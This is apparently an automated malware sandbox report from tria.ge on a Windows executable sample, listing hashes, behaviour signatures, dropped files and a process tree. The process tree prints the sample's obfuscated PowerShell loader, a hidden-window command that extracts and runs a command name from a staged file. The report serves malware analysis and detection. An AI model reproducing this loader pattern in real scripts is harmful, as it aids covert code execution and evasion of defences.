Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18/10/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Variabelforklaringen.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Variabelforklaringen.ps1
Resource
win10v2004-20241007-en
General
-
Target
7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe
-
Size
738KB
-
MD5
884358a9e9da158f576b7b7e42521d70
-
SHA1
a9d488b27fc2d65df89c1049c9cdf380e37e435f
-
SHA256
7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd
-
SHA512
630c905e255424dc8e54a8b945aaa5673e6ff25fe4e2f9713b73a3f5a622ff8f5d33bfc06ccecd85e5017bac27e31007c878acba32af509000a6c51fdaea0216
-
SSDEEP
12288:javPpBdFOdWbKSYQNGHkROyGOs61IYZVAecgs9FMa1Mdq8jJN:javzLDK+NjDGMIYO7MoON
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2488 powershell.exe 1652 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Grubstaking.bro 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1652 powershell.exe 2488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2488 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 31 PID 2028 wrote to memory of 2488 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 31 PID 2028 wrote to memory of 2488 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 31 PID 2028 wrote to memory of 2488 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 31 PID 2028 wrote to memory of 1652 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 33 PID 2028 wrote to memory of 1652 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 33 PID 2028 wrote to memory of 1652 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 33 PID 2028 wrote to memory of 1652 2028 7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe"C:\Users\Admin\AppData\Local\Temp\7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$supportable=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Variabelforklaringen.Adi';$Svinehundens=$supportable.SubString(52555,3);.$Svinehundens($supportable)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$supportable=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Variabelforklaringen.Adi';$Svinehundens=$supportable.SubString(52555,3);.$Svinehundens($supportable)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD55806dd633468971d3469bdd121e2b2ca
SHA1337badccf843962880fe270623807d8a466c306d
SHA256a36b736eef18712c52ed04d5f19fa68bc2e3ad7df304f3448accd35aa27f70f4
SHA5123c5a805e4d6c4e1cb02fc8a3fb313c4588e1bf3575c265acae9a46a55151fa06d9f4d28ab3941c6c0f45564f33b4272de3b907f66890023d492d5085a4516630